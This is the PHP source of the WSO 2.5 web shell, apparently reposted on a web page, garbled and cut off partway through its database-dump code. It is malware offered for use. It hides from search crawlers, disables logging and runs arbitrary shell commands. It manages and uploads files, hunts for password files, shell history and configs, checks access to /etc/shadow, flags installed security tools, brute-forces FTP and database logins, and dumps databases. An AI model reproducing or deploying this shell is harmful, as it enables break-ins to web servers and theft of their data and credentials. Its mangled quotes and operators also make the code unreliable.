?php $auth_pass = «63a9f0ea7bb98050796b649e85481845»;
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (!empty ($_SERVER ['HTTP_USER_AGENT'])) {$userAgents = array ("Google", «Slurp», «MSNBot», «ia_archiver», "Yandex", «Rambler»);
if (preg_match ('/'. implode ('|', $userAgents). '/i', $_SERVER ['HTTP_USER_AGENT'])) {header ('HTTP/1.0 404 Not Found');
exit;}}
@ini_set ('error_log', NULL);
@ini_set ('log_errors',0);
@ini_set ('max_execution_time',0);
@set_time_limit (0);
@set_magic_quotes_runtime (0);
@define ('WSO_VERSION', '2.5');
if (get_magic_quotes_gpc ()) {function WSOstripslashes ($array) {return is_array ($array)? array_map ('WSOstripslashes', $array): stripslashes ($array);}
$_POST = WSOstripslashes ($_POST);
$_COOKIE = WSOstripslashes ($_COOKIE);}
function wsoLogin () {die ("
Password: ");}
function WSOsetcookie ($k, $v) {$_COOKIE [$k] = $v;
setcookie ($k, $v);}
if (!empty ($auth_pass)) {if (isset ($_POST ['pass']) (md5 ($_POST ['pass']) == $auth_pass))
WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']), $auth_pass);
if (!isset ($_COOKIE [md5 ($_SERVER ['HTTP_HOST'])]) || ($_COOKIE [md5 ($_SERVER ['HTTP_HOST'])]!= $auth_pass))
wsoLogin ();}
if (strtolower (substr (PHP_OS,0,3)) == «win»)
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get ('safe_mode');
if (!$safe_mode)
error_reporting (0);
$disable_functions = @ini_get ('disable_functions');
$home_cwd = @getcwd ();
if (isset ($_POST ['c']))
@chdir ($_POST ['c']);
$cwd = @getcwd ();
if ($os == 'win') {$home_cwd = str_replace ("\", "/", $home_cwd);
$cwd = str_replace ("\", "/", $cwd);}
if ($cwd [strlen ($cwd)-1]!= '/')
$cwd. = '/';
if (!isset ($_COOKIE [md5 ($_SERVER ['HTTP_HOST']). 'ajax']))
$_COOKIE [md5 ($_SERVER ['HTTP_HOST']). 'ajax'] = (bool)$default_use_ajax;
if ($os == 'win')
$aliases = array ("List Directory" => «dir»,
"Find index.php in current dir" => «dir /s /w /b index.php»,
"Find config.php in current dir" => «dir /s /w /b config.php»,
"Show active connections" => «netstat -an»,
"Show running services" => «net start»,
"User accounts" => «net user»,
"Show computers" => «net view»,
"ARP Table" => «arp -a»,
"IP Configuration" => «ipconfig /all»);
else
$aliases = array ("List dir" => «ls -lha»,
"list file attributes on a Linux second extended file system" => «lsattr -va»,
"show opened ports" => «netstat -an | grep -i listen»,
"process status" => «ps aux»,
"Find" => "",
"find all suid files" => «find / -type f -perm -04000 -ls»,
"find suid files in current dir" => «find. -type f -perm -04000 -ls»,
"find all sgid files" => «find / -type f -perm -02000 -ls»,
"find sgid files in current dir" => «find. -type f -perm -02000 -ls»,
"find config.inc.php files" => «find / -type f -name config.inc.php»,
"find config* files" => «find / -type f -name \»config\"",
"find config files in current dir" => «find. -type f -name \»config\"",
"find all writable folders and files" => «find / -perm -2 -ls»,
"find all writable folders and files in current dir" => «find. -perm -2 -ls»,
"find all service.pwd files" => «find / -type f -name service.pwd»,
"find service.pwd files in current dir" => «find. -type f -name service.pwd»,
"find all.htpasswd files" => «find / -type f -name.htpasswd»,
"find.htpasswd files in current dir" => «find. -type f -name.htpasswd»,
"find all.bash_history files" => «find / -type f -name.bash_history»,
"find.bash_history files in current dir" => «find. -type f -name.bash_history»,
"find all.fetchmailrc files" => «find / -type f -name.fetchmailrc»,
"find.fetchmailrc files in current dir" => «find. -type f -name.fetchmailrc»,
"Locate" => "",
"locate httpd.conf files" => «locate httpd.conf»,
"locate vhosts.conf files" => «locate vhosts.conf»,
"locate proftpd.conf files" => «locate proftpd.conf»,
"locate psybnc.conf files" => «locate psybnc.conf»,
"locate my.conf files" => «locate my.conf»,
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => «locate cfg.php»,
"locate conf.php files" => «locate conf.php»,
"locate config.dat files" => «locate config.dat»,
"locate config.php files" => «locate config.php»,
"locate config.inc files" => «locate config.inc»,
"locate config.inc.php" => «locate config.inc.php»,
"locate config.default.php files" => «locate config.default.php»,
"locate config files " => «locate config»,
"locate.conf files"=>"locate '.conf'",
"locate.pwd files" => «locate '.pwd'»,
"locate.sql files" => «locate '.sql'»,
"locate.htpasswd files" => «locate '.htpasswd'»,
"locate.bash_history files" => «locate '.bash_history'»,
"locate.mysql_history files" => «locate '.mysql_history'»,
"locate.fetchmailrc files" => «locate '.fetchmailrc'»,
"locate backup files" => «locate backup»,
"locate dump files" => «locate dump»,
"locate priv files" => «locate priv»);
function wsoHeader () {if (empty ($_POST ['charset']))
$_POST ['charset'] = $GLOBALS ['default_charset'];
global $color;
echo "". $_SERVER ['HTTP_HOST']. " — WSO ". WSO_VERSION. "
body {background-color:#444;color:#e1e1e1;}
body, td, th {font: 9pt Lucida, Verdana;margin:0;vertical-align:top;color:#e1e1e1;}
table.info {color:#fff;background-color:#222;}
span, h1, a {color: $color!important;}
span {font-weight: bolder;}
h1 {border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}
div.content {padding: 5px;margin-left:5px;background-color:#333;}
a {text-decoration:none;}
a:hover {text-decoration:underline;}.ml1 {border:1px solid #444;padding:5px;margin:0;overflow: auto;}.bigarea {width:100%;height:300px;}
input, textarea, select {margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace, 'Courier New';}
form {margin:0px;}
toolsTbl {text-align:center;}.toolsInp {width: 300px}.main th {text-align:left;background-color:#5e5e5e;}.main tr:hover {background-color:#5e5e5e}. l1 {background-color:#444}. l2 {background-color:#333}
pre {font-family:Courier, Monospace;}
var c_ = '". htmlspecialchars ($GLOBALS ['cwd']). "';
var a_ = '". htmlspecialchars (@$_POST ['a']). "'
var charset_ = '". htmlspecialchars (@$_POST ['charset']). "';
var p1_ = '". ((strpos (@$_POST ['p1'], "\n")!==false)?'':htmlspecialchars ($_POST ['p1'], ENT_QUOTES)). "';
var p2_ = '". ((strpos (@$_POST ['p2'], "\n")!==false)?'':htmlspecialchars ($_POST ['p2'], ENT_QUOTES)). "';
var p3_ = '". ((strpos (@$_POST ['p3'], "\n")!==false)?'':htmlspecialchars ($_POST ['p3'], ENT_QUOTES)). "';
var d = document;
function set (a, c, p1, p2, p3, charset) {if (a!=null) d.mf. a.value=a;else d.mf. a.value=a_;
if (c!=null) d.mf. c.value=c;else d.mf. c.value=c_;
if (p1!=null) d.mf. p1.value=p1;else d.mf. p1.value=p1_;
if (p2!=null) d.mf. p2.value=p2;else d.mf. p2.value=p2_;
if (p3!=null) d.mf. p3.value=p3;else d.mf. p3.value=p3_;
if (charset!=null) d.mf.charset.value=charset;else d.mf.charset.value=charset_;}
function g (a, c, p1, p2, p3, charset) {set (a, c, p1, p2, p3, charset);
d.mf.submit ();}
function a (a, c, p1, p2, p3, charset) {set (a, c, p1, p2, p3, charset);
var params = 'ajax=true';
for (i=0;i Read file
Make dir:$is_writable
Make file:$is_writable
Execute
Upload file:$is_writable
";}
if (!function_exists ("posix_getpwuid") (strpos ($GLOBALS ['disable_functions'], 'posix_getpwuid')===false)) {function posix_getpwuid ($p) {return false;}}
if (!function_exists ("posix_getgrgid") (strpos ($GLOBALS ['disable_functions'], 'posix_getgrgid')===false)) {function posix_getgrgid ($p) {return false;}}
function wsoEx ($in) {$out = '';
if (function_exists ('exec')) {@exec ($in, $out);
$out = @join ("\n", $out);} elseif (function_exists ('passthru')) {ob_start ();
@passthru ($in);
$out = ob_get_clean ();} elseif (function_exists ('system')) {ob_start ();
@system ($in);
$out = ob_get_clean ();} elseif (function_exists ('shell_exec')) {$out = shell_exec ($in);} elseif (is_resource ($f = @popen ($in, "r"))) {$out = "";
while (!@feof ($f))
$out. = fread ($f,1024);
pclose ($f);}
return $out;}
function wsoViewSize ($s) {if (is_int ($s))
$s = sprintf ("%u", $s);
if ($s = 1073741824)
return sprintf ('%1.2f', $s / 1073741824). ' GB';
elseif ($s = 1048576)
return sprintf ('%1.2f', $s / 1048576). ' MB';
elseif ($s = 1024)
return sprintf ('%1.2f', $s / 1024). ' KB';
else
return $s. ' B';}
function wsoPerms ($p) {if (($p 0xC000) == 0xC000)$i = 's';
elseif (($p 0xA000) == 0xA000)$i = 'l';
elseif (($p 0x8000) == 0x8000)$i = '-';
elseif (($p 0x6000) == 0x6000)$i = 'b';
elseif (($p 0x4000) == 0x4000)$i = 'd';
elseif (($p 0x2000) == 0x2000)$i = 'c';
elseif (($p 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i. = (($p 0x0100)? 'r': '-');
$i. = (($p 0x0080)? 'w': '-');
$i. = (($p 0x0040)? (($p 0x0800)? 's': 'x'): (($p 0x0800)? 'S': '-'));
$i. = (($p 0x0020)? 'r': '-');
$i. = (($p 0x0010)? 'w': '-');
$i. = (($p 0x0008)? (($p 0x0400)? 's': 'x'): (($p 0x0400)? 'S': '-'));
$i. = (($p 0x0004)? 'r': '-');
$i. = (($p 0x0002)? 'w': '-');
$i. = (($p 0x0001)? (($p 0x0200)? 't': 'x'): (($p 0x0200)? 'T': '-'));
return $i;}
function wsoPermsColor ($f) {if (!@is_readable ($f))
return ''. wsoPerms (@fileperms ($f)). '';
elseif (!@is_writable ($f))
return ''. wsoPerms (@fileperms ($f)). '';
else
return ''. wsoPerms (@fileperms ($f)). '';}
function wsoScandir ($dir) {if (function_exists ("scandir")) {return scandir ($dir);} else {$dh = opendir ($dir);
while (false!== ($filename = readdir ($dh)))
$files [] = $filename;
return $files;}}
function wsoWhich ($p) {$path = wsoEx ('which '. $p);
if (!empty ($path))
return $path;
return false;}
function actionSecInfo () {wsoHeader ();
echo '
Server security information
';
function wsoSecParam ($n, $v) {$v = trim ($v);
if ($v) {echo ''. $n. ': ';
if (strpos ($v, "\n") === false)
echo $v. '';
else
echo ''. $v. '';}}
wsoSecParam ('Server software', @getenv ('SERVER_SOFTWARE'));
if (function_exists ('apache_get_modules'))
wsoSecParam ('Loaded Apache modules', implode (', ', apache_get_modules ()));
wsoSecParam ('Disabled PHP Functions', $GLOBALS ['disable_functions']?$GLOBALS ['disable_functions']:'none');
wsoSecParam ('Open base dir', @ini_get ('open_basedir'));
wsoSecParam ('Safe mode exec dir', @ini_get ('safe_mode_exec_dir'));
wsoSecParam ('Safe mode include dir', @ini_get ('safe_mode_include_dir'));
wsoSecParam ('cURL support', function_exists ('curl_version')?'enabled':'no');
$temp=array ();
if (function_exists ('mysql_get_client_info'))
$temp [] = «MySql (».mysql_get_client_info (). ")";
if (function_exists ('mssql_connect'))
$temp [] = «MSSQL»;
if (function_exists ('pg_connect'))
$temp [] = «PostgreSQL»;
if (function_exists ('oci_connect'))
$temp [] = «Oracle»;
wsoSecParam ('Supported databases', implode (', ', $temp));
echo '';
if ($GLOBALS ['os'] == 'nix') {wsoSecParam ('Readable /etc/passwd', @is_readable ('/etc/passwd')?"yes [view]":'no');
wsoSecParam ('Readable /etc/shadow', @is_readable ('/etc/shadow')?"yes [view]":'no');
wsoSecParam ('OS version', @file_get_contents ('/proc/version'));
wsoSecParam ('Distr name', @file_get_contents ('/etc/issue.net'));
if (!$GLOBALS ['safe_mode']) {$userful = array ('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$danger = array ('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
$downloaders = array ('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
echo '';
$temp=array ();
foreach ($userful as $item)
if (wsoWhich ($item))
$temp [] = $item;
wsoSecParam ('Userful', implode (', ', $temp));
$temp=array ();
foreach ($danger as $item)
if (wsoWhich ($item))
$temp [] = $item;
wsoSecParam ('Danger', implode (', ', $temp));
$temp=array ();
foreach ($downloaders as $item)
if (wsoWhich ($item))
$temp [] = $item;
wsoSecParam ('Downloaders', implode (', ', $temp));
echo '';
wsoSecParam ('HDD space', wsoEx ('df -h'));
wsoSecParam ('Hosts', @file_get_contents ('/etc/hosts'));
echo 'posix_getpwuid ("Read" /etc/passwd) FromTo';
if (isset ($_POST ['p2'], $_POST ['p3']) && is_numeric ($_POST ['p2']) && is_numeric ($_POST ['p3'])) {$temp = "";
for (;$_POST ['p2'] $GLOBALS ['cwd']. $dirContent [$i],
'modify' => date ('Y-m-d H:i:s', @filemtime ($GLOBALS ['cwd']. $dirContent [$i])),
'perms' => wsoPermsColor ($GLOBALS ['cwd']. $dirContent [$i]),
'size' => @filesize ($GLOBALS ['cwd']. $dirContent [$i]),
'owner' => $ow ['name']?$ow ['name']:@fileowner ($dirContent [$i]),
'group' => $gr ['name']?$gr ['name']:@filegroup ($dirContent [$i]));
if (@is_file ($GLOBALS ['cwd']. $dirContent [$i]))
$files [] = array_merge ($tmp, array ('type' => 'file'));
elseif (@is_link ($GLOBALS ['cwd']. $dirContent [$i]))
$dirs [] = array_merge ($tmp, array ('type' => 'link', 'link' => readlink ($tmp ['path'])));
elseif (@is_dir ($GLOBALS ['cwd']. $dirContent [$i]))
$dirs [] = array_merge ($tmp, array ('type' => 'dir'));}
$GLOBALS ['sort'] = $sort;
function wsoCmp ($a, $b) {if ($GLOBALS ['sort'] [0]!= 'size')
return strcmp (strtolower ($a [$GLOBALS ['sort'] [0]]), strtolower ($b [$GLOBALS ['sort'] [0]]))* ($GLOBALS ['sort'] [1]?1:-1);
else
return (($a ['size'] ['. htmlspecialchars ($f ['name']). ']'). ''. (($f ['type']=='file')?wsoViewSize ($f ['size']):$f ['type']). ''. $f ['modify']. ''. $f ['owner']. '/'. $f ['group']. ''. $f ['perms']. 'R T'. (($f ['type']=='file')?' E D':''). '';
$l = $l?0:1;}
echo "
CopyMoveDelete";
if (class_exists ('ZipArchive'))
echo «Compress (zip) Uncompress (zip)»;
echo «Compress (tar.gz)»;
if (!empty ($_COOKIE ['act']) && @count ($_COOKIE ['f']))
echo «Paste / Compress»;
echo " ";
if (!empty ($_COOKIE ['act']) && @count ($_COOKIE ['f']) && (($_COOKIE ['act'] == 'zip') || ($_COOKIE ['act'] == 'tar')))
echo «file name: »;
echo "
";
wsoFooter ();}
function actionStringTools () {if (!function_exists ('hex2bin')) {function hex2bin ($p) {return decbin (hexdec ($p));}}
if (!function_exists ('binhex')) {function binhex ($p) {return dechex (bindec ($p));}}
if (!function_exists ('hex2ascii')) {function hex2ascii ($p) {$r='';for ($i=0;$i strLen ($p);$i+=2) {$r. =chr (hexdec ($p [$i]. $p [$i+1]));} return $r;}}
if (!function_exists ('ascii2hex')) {function ascii2hex ($p) {$r='';for ($i=0;$i strlen ($p);++$i)$r. = sprintf ('%02X', ord ($p [$i]));return strtoupper ($r);}}
if (!function_exists ('full_urlencode')) {function full_urlencode ($p) {$r='';for ($i=0;$i strlen ($p);++$i)$r. = '%'.dechex (ord ($p [$i]));return strtoupper ($r);}}
$stringTools = array ('Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'binhex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',);
if (isset ($_POST ['ajax'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', true);
ob_start ();
if (in_array ($_POST ['p1'], $stringTools))
echo $_POST'p1';
$temp = «document.getElementById ('strOutput').style.display='';document.getElementById ('strOutput').innerHTML='».addcslashes (htmlspecialchars (ob_get_clean ()), "\n\r\t\'\0"). "';\n";
echo strlen ($temp), "\n", $temp;
exit;}
if (empty ($_POST ['ajax'])!empty ($_POST ['p1']))
WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', 0);
wsoHeader ();
echo '
String conversions
';
echo "";
foreach ($stringTools as $k => $v)
echo "". $k. "";
echo " send using AJAX". (empty ($_POST ['p1'])?'':htmlspecialchars (@$_POST ['p2'])). "";
if (!empty ($_POST ['p1'])) {if (in_array ($_POST ['p1'], $stringTools)) echo htmlspecialchars ($_POST ['p1'] ($_POST ['p2']));}
echo"
Search files
Text
Path
Name
";
function wsoRecursiveGlob ($path) {if (substr ($path, -1)!= '/')
$path. ='/';
$paths = @array_unique (@array_merge (@glob ($path. $_POST ['p3']), @glob ($path. '*', GLOB_ONLYDIR)));
if (is_array ($paths)&&@count ($paths)) {foreach ($paths as $item) {if (@is_dir ($item)) {if ($path!=$item)
wsoRecursiveGlob ($item);} else {if (empty ($_POST ['p2']) || @strpos (file_get_contents ($item), $_POST ['p2'])!==false)
echo "".htmlspecialchars ($item). "";}}}}
if (@$_POST ['p3'])
wsoRecursiveGlob ($_POST ['c']);
echo "
Search for hash
";
wsoFooter ();}
function actionFilesTools () {if (isset ($_POST ['p1']))
$_POST ['p1'] = urldecode ($_POST ['p1']);
if (@$_POST ['p2']=='download') {if (@is_file ($_POST ['p1']) @is_readable ($_POST ['p1'])) {ob_start ("ob_gzhandler", 4096);
header ("Content-Disposition: attachment; filename=".basename ($_POST ['p1']));
if (function_exists ("mime_content_type")) {$type = @mime_content_type ($_POST ['p1']);
header ("Content-Type: ". $type);} else
header ("Content-Type: application/octet-stream");
$fp = @fopen ($_POST ['p1'], «r»);
if ($fp) {while (!@feof ($fp))
echo @fread ($fp, 1024);
fclose ($fp);}} exit;}
if (@$_POST ['p2'] == 'mkfile') {if (!file_exists ($_POST ['p1'])) {$fp = @fopen ($_POST ['p1'], 'w');
if ($fp) {$_POST ['p2'] = «edit»;
fclose ($fp);}}}
wsoHeader ();
echo '
File tools
';
if (!file_exists (@$_POST ['p1'])) {echo 'File not exists';
wsoFooter ();
return;}
$uid = @posix_getpwuid (@fileowner ($_POST ['p1']));
if (!$uid) {$uid ['name'] = @fileowner ($_POST ['p1']);
$gid ['name'] = @filegroup ($_POST ['p1']);} else $gid = @posix_getgrgid (@filegroup ($_POST ['p1']));
echo 'Name: '.htmlspecialchars (@basename ($_POST ['p1'])). ' Size: '. (is_file ($_POST ['p1'])?wsoViewSize (filesize ($_POST ['p1'])):'-'). ' Permission: '.wsoPermsColor ($_POST ['p1']). ' Owner/Group: '. $uid ['name']. '/'. $gid ['name']. '';
echo 'Change time: '.date ('Y-m-d H:i:s', filectime ($_POST ['p1'])). ' Access time: '.date ('Y-m-d H:i:s', fileatime ($_POST ['p1'])). ' Modify time: '.date ('Y-m-d H:i:s', filemtime ($_POST ['p1'])). '';
if (empty ($_POST ['p2']))
$_POST ['p2'] = 'view';
if (is_file ($_POST ['p1']))
$m = array ('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array ('Chmod', 'Rename', 'Touch');
foreach ($m as $v)
echo ''. ((strtolower ($v)==@$_POST ['p2'])?' ['. $v. ']':$v). ' ';
echo '';
switch ($_POST ['p2']) {case 'view'
echo '';
$fp = @fopen ($_POST ['p1'], 'r');
if ($fp) {while (!@feof ($fp))
echo htmlspecialchars (@fread ($fp, 1024));
@fclose ($fp);}
echo '';
break;
case 'highlight'
if (@is_readable ($_POST ['p1'])) {echo '';
$code = @highlight_file ($_POST ['p1'], true);
echo str_replace (array ('';
break;
case 'hexdump'
$c = @file_get_contents ($_POST ['p1']);
$n = 0;
$h = array ('00000000', '', '');
$len = strlen ($c);
for ($i=0; $i';
break;
case 'touch'
if (!empty ($_POST ['p3'])) {$time = strtotime ($_POST ['p3']);
if ($time) {if (!touch ($_POST ['p1'], $time, $time))
echo 'Fail!';
else
echo 'Touched!';} else echo 'Bad time format!';}
clearstatcache ();
echo 'p3_="";';
break;}
echo '
';
wsoFooter ();}
function actionConsole () {if (!empty ($_POST ['p1'])!empty ($_POST ['p2'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'stderr_to_out', true);
$_POST ['p1']. = ' 2> 1';} elseif (!empty ($_POST ['p1']))
WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'stderr_to_out', 0);
if (isset ($_POST ['ajax'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', true);
ob_start ();
echo d.cf.cmd.value='';\n;
$temp = @iconv ($_POST ['charset'], 'UTF-8', addcslashes (\n$. $_POST ['p1']. \n.wsoEx ($_POST ['p1']), \n\r\t\\'\0));
if (preg_match (!. *cd\s+ ([^;]+)$!, $_POST ['p1'], $match)) {if (@chdir ($match [1])) {$GLOBALS ['cwd'] = @getcwd ();
echo c_='. $GLOBALS ['cwd']. ';;}}
echo d.cf.output.value+='. $temp. ';;
echo d.cf.output.scrollTop = d.cf.output.scrollHeight;;
$temp = ob_get_clean ();
echo strlen ($temp), \n, $temp;
exit;}
if (empty ($_POST ['ajax'])!empty ($_POST ['p1']))
WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', 0);
wsoHeader ();
echo script if (window.Event) window.captureEvents (Event.KEYDOWN);
var cmds = new Array ('');
var cur = 0;
function kp (e) {var n = (window.Event)? e.which: e.keyCode;
if (n == 38) {cur—;
if (cur>=0)
document.cf.cmd.value = cmds [cur];
else
cur++;} else if (n == 40) {cur++;
if (cur cmds.length)
document.cf.cmd.value = cmds [cur];
else
cur—;}}
function add (cmd) {cmds.pop ();
cmds.push (cmd);
cmds.push ('');
cur = cmds.length-1;}
";
echo '
Console
';
foreach ($GLOBALS ['aliases'] as $n => $v) {if ($v == '') {echo '';
continue;}
echo ''. $n. '';}
echo ' send using AJAX redirect stderr to stdout (2>&1)';
if (!empty ($_POST ['p1'])) {echo htmlspecialchars ("$ ". $_POST ['p1']. "\n".wsoEx ($_POST ['p1']));}
echo '$';
echo '
d.cf.cmd.focus ();';
wsoFooter ();}
function actionLogout () {setcookie (md5 ($_SERVER ['HTTP_HOST']), '', time () — 3600);
die ('bye!');}
function actionSelfRemove () {if ($_POST ['p1'] == 'yes')
if (@unlink (preg_replace ('!\ (\d+\)\s. *!', '', __FILE__)))
die ('Shell has been removed');
else
echo 'unlink error!';
if ($_POST ['p1']!= 'yes')
wsoHeader ();
echo ' h1 Suicide /h1 div class=content Really want to remove the shell? br a href=# onclick= g (null, null, \'yes\') Yes /a /div ';
wsoFooter ();}
function actionBruteforce () {wsoHeader ();
if (isset ($_POST ['proto'])) {echo '
Results
Type: '.htmlspecialchars ($_POST ['proto']). ' Server: '.htmlspecialchars ($_POST ['server']). '';
if ($_POST ['proto'] == 'ftp') {function wsoBruteForce ($ip, $port, $login, $pass) {$fp = @ftp_connect ($ip, $port?$port:21);
if (!$fp) return false;
$res = @ftp_login ($fp, $login, $pass);
@ftp_close ($fp);
return $res;}} elseif ($_POST ['proto'] == 'mysql') {function wsoBruteForce ($ip, $port, $login, $pass) {$res = @mysql_connect ($ip. ':'. ($port?$port:3306), $login, $pass);
@mysql_close ($res);
return $res;}} elseif ($_POST ['proto'] == 'pgsql') {function wsoBruteForce ($ip, $port, $login, $pass) {$str = «host='». $ip. "' port='". $port. "' user='". $login. "' password='". $pass. "' dbname=postgres";
$res = @pg_connect ($str);
@pg_close ($res);
return $res;}}
$success = 0;
$attempts = 0;
$server = explode (":", $_POST ['server']);
if ($_POST ['type'] == 1) {$temp = @file ('/etc/passwd');
if (is_array ($temp))
foreach ($temp as $line) {$line = explode (":", $line);
++$attempts;
if (wsoBruteForce (@$server [0], @$server [1], $line [0], $line [0])) {$success++;
echo ''.htmlspecialchars ($line [0]). ':'.htmlspecialchars ($line [0]). '';}
if (@$_POST ['reverse']) {$tmp = "";
for ($i=strlen ($line [0])-1; $i>=0; —$i)
$tmp. = $line [0] [$i];
++$attempts;
if (wsoBruteForce (@$server [0], @$server [1], $line [0], $tmp)) {$success++;
echo ''.htmlspecialchars ($line [0]). ':'.htmlspecialchars ($tmp);}}}} elseif ($_POST ['type'] == 2) {$temp = @file ($_POST ['dict']);
if (is_array ($temp))
foreach ($temp as $line) {$line = trim ($line);
++$attempts;
if (wsoBruteForce ($server [0], @$server [1], $_POST ['login'], $line)) {$success++;
echo ''.htmlspecialchars ($_POST ['login']). ':'.htmlspecialchars ($line). '';}}}
echo «Attempts: $attempts Success: $success
»;}
echo '
Bruteforce
Type'. 'FTPMySqlPostgreSql'. ''. ''. ''. 'Server:port'. ''. 'Brute type'. ' /etc/passwd'. ' reverse (login -> nigol)'. ' Dictionary'. 'Login'. ''. 'Dictionary'. ''. '';
echo '
';
wsoFooter ();}
function actionSql () {class DbClass {var $type;
var $link;
var $res;
function DbClass ($type) {$this->type = $type;}
function connect ($host, $user, $pass, $dbname) {switch ($this->type) {case 'mysql'
if ($this->link = @mysql_connect ($host, $user, $pass, true)) return true;
break;
case 'pgsql'
$host = explode (':', $host);
if (!$host [1]) $host [1]=5432;
if ($this->link = @pg_connect ("host= {$host [0]} port= {$host [1]} user=$user password=$pass dbname=$dbname")) return true;
break;}
return false;}
function selectdb ($db) {switch ($this->type) {case 'mysql'
if (@mysql_select_db ($db)) return true;
break;}
return false;}
function query ($str) {switch ($this->type) {case 'mysql'
return $this->res = @mysql_query ($str);
break;
case 'pgsql'
return $this->res = @pg_query ($this->link, $str);
break;}
return false;}
function fetch () {$res = func_num_args ()?func_get_arg (0):$this->res;
switch ($this->type) {case 'mysql'
return @mysql_fetch_assoc ($res);
break;
case 'pgsql'
return @pg_fetch_assoc ($res);
break;}
return false;}
function listDbs () {switch ($this->type) {case 'mysql'
return $this->query ("SHOW databases");
break;
case 'pgsql'
return $this->res = $this->query ("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;}
return false;}
function listTables () {switch ($this->type) {case 'mysql'
return $this->res = $this->query ('SHOW TABLES');
break;
case 'pgsql'
return $this->res = $this->query ("select table_name from information_schema.tables where table_schema!= 'information_schema' AND table_schema!= 'pg_catalog'");
break;}
return false;}
function error () {switch ($this->type) {case 'mysql'
return @mysql_error ();
break;
case 'pgsql'
return @pg_last_error ();
break;}
return false;}
function setCharset ($str) {switch ($this->type) {case 'mysql'
if (function_exists ('mysql_set_charset'))
return @mysql_set_charset ($str, $this->link);
else
$this->query ('SET CHARSET '. $str);
break;
case 'pgsql'
return @pg_set_client_encoding ($this->link, $str);
break;}
return false;}
function loadFile ($str) {switch ($this->type) {case 'mysql'
return $this->fetch ($this->query ("SELECT LOAD_FILE ('".addslashes ($str). "') as file"));
break;
case 'pgsql'
$this->query ("CREATE TABLE wso2 (file text);COPY wso2 FROM '".addslashes ($str). "';select file from wso2;");
$r=array ();
while ($i=$this->fetch ())
$r [] = $i ['file'];
$this->query ('drop table wso2');
return array ('file'=>implode ("\n", $r));
break;}
return false;}
function dump ($table, $fp = false) {switch ($this->type) {case 'mysql'
$res = $this->query ('SHOW CREATE TABLE '. $table. '');
$create = mysql_fetch_array ($res);
$sql = $create [1]. ";\n";
if ($fp) fwrite ($fp, $sql); else echo ($sql);
$this->query ('SELECT * FROM '. $table. '');
$i = 0;
$head = true;
while ($item = $this->fetch ()) {$sql = '';
if ($i % 1000 == 0) {$head = true;
$sql = ";\n\n";}
$columns = array ();
foreach ($item as $k= $v) {if ($v === null)
$item [$k] = NULL;
elseif (is_int ($v))
$item [$k] = $v;
else
$item [$k] = '. @mysql_real_escape_string ($v). ';
$columns [] = `. $k. `;}
if ($head) {$sql. = 'INSERT INTO `'. $table. '` ('.implode (, , $columns).) VALUES \n\t (.implode (, , $item). ')';
$head = false;} else
$sql. = \n\t, (.implode (, , $item). ')';
if ($fp) fwrite ($fp, $sql); else echo ($sql);
$i++;}
if (!$head)
if ($fp) fwrite ($fp,;\n\n); else echo (;\n\n);
break;
case 'pgsql'
$this— query ('SELECT * FROM '. $table);
while ($item = $this— fetch ()) {$columns = array ();
foreach ($item as $k= $v) {$item [$k] = '.addslashes ($v). ';
$columns [] = $k;}
$sql = 'INSERT INTO '. $table. ' ('.implode (, , $columns). ') VALUES ('.implode (, , $item). ');'. \n;
if ($fp) fwrite ($fp, $sql); else echo ($sql);}
break;}
return false;}};
$db = new DbClass ($_POST ['type']);
if ((@$_POST ['p2']=='download') (@$_POST ['p1']!='select')) {$db— connect ($_POST ['sql_host'], $_POST ['sql_login'], $_POST ['sql_pass'], $_POST ['sql_base']);
$db— selectdb ($_POST ['sql_base']);
switch ($_POST ['charset']) {case Windows-1251: $db— setCharset ('cp1251'); break;
case UTF-8: $db— setCharset ('utf8'); break;
case KOI8-R: $db— setCharset ('koi8r'); break;
case KOI8-U: $db— setCharset ('koi8u'); break;
case cp866: $db— setCharset ('cp866'); break;}
if (empty ($_POST ['file'])) {ob_start (ob_gzhandler, 4096);
header (Content-Disposition: attachment; filename=dump.sql);
header (Content-Type: text/plain);
foreach ($_POST ['tbl'] as $v)
$db— dump ($v);
exit;} elseif ($fp = @fopen ($_POST ['file'], 'w')) {foreach ($_POST ['tbl'] as $v)
$db— dum
Новости партнеров
